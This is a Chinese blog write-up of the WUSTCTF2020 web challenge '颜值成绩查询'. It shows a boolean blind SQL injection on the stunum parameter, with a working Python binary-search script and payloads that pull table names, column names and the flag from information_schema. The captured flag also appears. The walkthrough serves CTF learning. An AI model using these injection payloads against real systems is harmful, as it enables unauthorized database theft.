[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2023-01-27 20:45:56 发布
最新推荐文章于 2023-01-27 20:45:56 发布
阅读量239 收藏
点赞数
分类专栏: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/114649739
版权

访问页面;
分别输入1,2,3,4,为4个不同的结果,根据提示猜测应该是SQL注入;
在测试了各种类型的注入后,锁定为布尔注入;
首先输入

if(length(database()>1,1,0)

输出了stunum=1的结果;
当输入

if(length(database()>10,1,0)

则输出了stunum=0的结果;
这样我们就可以写脚本;

import requests
import time

flag = ""
for i in range(1, 100):
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        payload = 'http://70ea63cb-647e-4954-b2f7-a7fa97366c0a.node3.buuoj.cn/?stunum=1^(ascii(substr(database(),%d,1))>%d)' %(i,mid)
        res = requests.get(payload)

        if 'student number not exists' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
        time.sleep(0.1)
    if (mid == 32 or mid == 127):
        break
    flag = flag + chr(mid)
    print(flag)

其实数据库不需要跑出来,但是熟悉一下最简单的布尔注入条件语句还是挺好的;
数据库跑出来了;
ctf

然后,换个跑表名的payload;

payload = url + '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)' %(i,mid)

表明出来了;
flag,score
score我是不想看里头有什么东西了,直奔主题去看flag有什么;
换个跑列名的paylaod;

payload = url +"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)" % (i, mid)

出来了两个列;
flag,value
再看看里面的值;

payload = url + "1^(ascii(substr((select(group_concat(flag,0x2b,value))from(flag)),%d,1))>%d)" % (i, mid)

得到flag;
flag{7493a4ec-a8d9-44c3-884f-2283c4857b1c}

K1ose
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 648
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询1
最新发布
alwtj的博客
06-10 356
又试了试报错闭合,联合注入之类的,结果输出的都是student number not exists.测试了一下从1输到了5,第五个显示 student number not exists.开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~没有出错,说明payload构建成功,那就开始写python代码~这段代码用了二分查找,开始执行~输入1 0 0 / 1 0 0。没有出错,说明空格被过滤了~获得flag,游戏结束~构造一下payload。
re学习笔记(56)WUSTCTF – Re方向WP
12-21
文章以一系列WUSTCTF逆向工程挑战为例,展示了如何利用逆向工程技术来解密和获取隐藏的flag。 首先,让我们看看WUSTCTF的"re-Cr0ssFun"挑战。在这个问题中,作者使用了IDA64(Interactive Disassembler)来加载64位...
linux操作系统入门实验报告
03-09
**Linux操作系统入门实验报告** 本实验报告主要针对Linux操作系统的基础知识和操作技能进行阐述,旨在帮助初学者快速熟悉这一开源操作系统。实验过程中,我们将通过实际操作来了解和掌握Linux的基本命令行界面,...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
23种设计模式汇集       
07-09
### 23种设计模式汇集知识点详解 #### 设计模式概览 设计模式是一套被反复使用、多数人知晓的、经过分类编目的、代码设计经验的总结。它描述了在软件设计过程中的一些不断重复发生的问题,以及该问题的解决方案。...
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 781
[WUSTCTF2020]颜值成绩查询(布尔注入)
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 584
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]颜值成绩
shinygod的博客
04-09 433
知识点:布尔盲注 当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显 判断布尔盲注,测试一波 这种显示不存在 1'and length(database()) >1# 当用异或注入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来盲注。 import re import requests import string url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/" f
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值